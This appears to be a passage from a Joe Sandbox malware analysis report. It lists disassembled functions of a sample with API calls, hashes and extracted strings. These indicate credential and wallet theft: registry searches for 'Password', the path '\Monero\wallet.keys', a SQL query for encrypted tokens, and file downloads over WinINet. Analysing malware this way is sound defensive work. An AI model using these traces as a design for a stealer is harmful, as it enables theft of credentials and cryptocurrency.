                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091768F
                                        • lstrcat.KERNEL32(00000000,00931804), ref: 009176A0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009176D3
                                        • lstrcat.KERNEL32(00000000,00931808), ref: 009176ED
                                        • task.LIBCPMTD ref: 009176FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                                        • Instruction ID: 054c69c8d0a0dcaa48e31ad8daf03caf5af101b4a06718984245acbdf2332e3b
                                        • Opcode Fuzzy Hash: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                                        • Instruction Fuzzy Hash: F0312F72A04209EBCB04EBE4DC55EEF7775AB85302B144658E102B7160DE34A986DB52
                                        Function 00928100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006BDF00,00000000,?,00930E2C,00000000,?,00000000), ref: 00928130
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00928137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00928158
                                        • __aulldiv.LIBCMT ref: 00928172
                                        • __aulldiv.LIBCMT ref: 00928180
                                        • wsprintfA.USER32 ref: 009281AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                                        • Instruction ID: 3ce7f2e618f87c28c0a59267513e8a838ea814e13cadd934e54ebdc8ab6693ce
                                        • Opcode Fuzzy Hash: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                                        • Instruction Fuzzy Hash: FC21FCB1945218ABDB00DFD4DC49FAFB7B8FB44715F104609F605BB284DB7859018BA5
                                        Function 009160A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                        • InternetOpenA.WININET(00930DF7,00000001,00000000,00000000,00000000), ref: 0091610F
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916147
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0091618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009161B3
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 009161DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0091620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00916249
                                        • InternetCloseHandle.WININET(?), ref: 00916253
                                        • InternetCloseHandle.WININET(00000000), ref: 00916260
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                                        • Instruction ID: 6ba02c49d1d89c85062aaaba2107566fdccb0f2db0134fb47687623ee7416a2e
                                        • Opcode Fuzzy Hash: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                                        • Instruction Fuzzy Hash: 00513BB1A0021CABDB20DFA0DC59BEE77B8EB48705F108598E605A71C1DB746E89CF95
                                        Function 009172D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                                        • HeapFree.KERNEL32(00000000), ref: 00917459
                                        • task.LIBCPMTD ref: 00917555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                                        • Instruction ID: def5ce88940f58f1aabf1e2d5e148ac5dc4e22ef087e0a7c9a22b7ec5d015e49
                                        • Opcode Fuzzy Hash: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                                        • Instruction Fuzzy Hash: 18613CB5A0426D9BDB24DB50CC51BDAB7B9BF88300F0081E9E649A6181DF745FC9CFA0
                                        Function 009240B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,006BDB80,00000000,00020119,?), ref: 009240F4
                                        • RegQueryValueExA.ADVAPI32(?,006BE1D0,00000000,00000000,00000000,000000FF), ref: 00924118
                                        • RegCloseKey.ADVAPI32(?), ref: 00924122
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924147
                                        • lstrcat.KERNEL32(?,006BE350), ref: 0092415B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID: Pk$k
                                        • API String ID: 690832082-364392430
                                        • Opcode ID: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                                        • Instruction ID: f6ad910a75ef1c272c20282cca9718f7b528261db83c42ee5a854704c2de1b8c
                                        • Opcode Fuzzy Hash: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                                        • Instruction Fuzzy Hash: 68418BB6D1020C6BDB14EBA0EC56FFE773DAB8C300F004598B71657185EE755B888B92
                                        Function 0091BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        • lstrlen.KERNEL32(00000000), ref: 0091BC9F
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0091BCCD
                                        • lstrlen.KERNEL32(00000000), ref: 0091BDA5
                                        • lstrlen.KERNEL32(00000000), ref: 0091BDB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                                        • Instruction ID: 3c51e9cdb52a3b4134136bdb5b81dfcd13fdb927a7259aa7e987a337a20ff8b5
                                        • Opcode Fuzzy Hash: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                                        • Instruction Fuzzy Hash: CAB11F769101189BDB04FBA0ED96FEE733DAF94300F404568F506B7096EF346A49CBA6
                                        Function 00926770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                                        • Instruction ID: 3c78edfea26c59d734225bb960f3449e5e79bd03828ab1ced10eb525945afd0c
                                        • Opcode Fuzzy Hash: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                                        • Instruction Fuzzy Hash: FEF05830908399EFD344AFE0E909B2CBF74FB08703F0402D8E609A7690EA705F419B96
                                        Function 00924780 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,006BE458), ref: 009247DB
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924801
                                        • lstrcat.KERNEL32(?,?), ref: 00924820
                                        • lstrcat.KERNEL32(?,?), ref: 00924834
                                        • lstrcat.KERNEL32(?,006AB608), ref: 00924847
                                        • lstrcat.KERNEL32(?,?), ref: 0092485B
                                        • lstrcat.KERNEL32(?,006BDAE0), ref: 0092486F
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                                          • Part of subcall function 00924570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                                          • Part of subcall function 00924570: RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                                          • Part of subcall function 00924570: wsprintfA.USER32 ref: 009245A6
                                          • Part of subcall function 00924570: FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID: Xk
                                        • API String ID: 2540262943-89453425
                                        • Opcode ID: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                                        • Instruction ID: 556a604226cd32ac3f0389388ee588e2261b9808b88ebf299b21e6c45a806e22
                                        • Opcode Fuzzy Hash: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                                        • Instruction Fuzzy Hash: D83153B690031867CB10F7B0EC85FEE737CAB98700F404989B355A6095EEB4A7C98B95
                                        Function 00914FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00914FCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00914FD1
                                        • InternetOpenA.WININET(00930DDF,00000000,00000000,00000000,00000000), ref: 00914FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00915011
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00915041
                                        • InternetCloseHandle.WININET(?), ref: 009150B9
                                        • InternetCloseHandle.WININET(?), ref: 009150C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                                        • Instruction ID: c457839a0055d04b3e07c23f0b3590f04640912a1f8386b4d42d165e487f37ff
                                        • Opcode Fuzzy Hash: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                                        • Instruction Fuzzy Hash: 4A31E6B4A00218EBDB20CF94DC85BDDB7B4EB48705F5081D9EA09B7281DB746EC58F99
                                        Function 009283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                                        • wsprintfA.USER32 ref: 00928459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,006BE098,00000000,000F003F,?,00000400), ref: 009284EC
                                        • lstrlen.KERNEL32(?), ref: 00928501
                                        • RegQueryValueExA.ADVAPI32(00000000,006BE140,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00930B34), ref: 00928599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00928608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0092861A
                                        Strings
